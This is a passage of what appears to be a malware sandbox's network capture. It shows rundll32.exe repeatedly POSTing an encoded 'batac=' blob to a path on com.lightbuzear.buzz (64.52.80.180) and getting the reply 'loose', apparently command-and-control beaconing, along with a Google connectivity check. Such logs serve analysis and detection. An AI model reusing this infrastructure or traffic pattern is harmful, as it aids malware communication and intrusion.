              2022-08-14 06:39:38 UTC21OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:39 UTC22INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:39 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:39 UTC23INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.224918564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:39 UTC23OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:39 UTC23OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:40 UTC24INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:40 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:40 UTC24INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.224918664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:40 UTC24OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:40 UTC25OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:41 UTC26INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:41 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:41 UTC26INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.224918764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:41 UTC26OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:41 UTC26OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:42 UTC27INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:42 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:42 UTC28INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.224918864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:42 UTC28OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:42 UTC28OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:43 UTC29INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:43 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:43 UTC29INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.224918964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:44 UTC29OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:44 UTC30OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:44 UTC31INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:44 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:44 UTC31INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.224919064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:45 UTC31OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:45 UTC31OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:45 UTC32INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:45 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:45 UTC33INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.224919164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:46 UTC33OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:46 UTC33OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:46 UTC34INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:46 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:46 UTC34INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.2249174142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:27 UTC4OUTPOST / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: www.Google.com
              Content-Length: 0
              Cache-Control: no-cache
              2022-08-14 06:39:27 UTC4INHTTP/1.1 405 Method Not Allowed
              Allow: GET, HEAD
              Date: Sun, 14 Aug 2022 06:39:27 GMT
              Content-Type: text/html; charset=UTF-8
              Server: gws
              Content-Length: 1589
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
              Connection: close
              2022-08-14 06:39:27 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61
              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 405 (Method Not Allowed)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px aria
              2022-08-14 06:39:27 UTC5INData Raw: 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b
              Data Ascii: ges/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{back


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.224919264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:47 UTC34OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:47 UTC35OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:47 UTC36INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:47 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:47 UTC36INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.224919364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:48 UTC36OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:48 UTC36OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
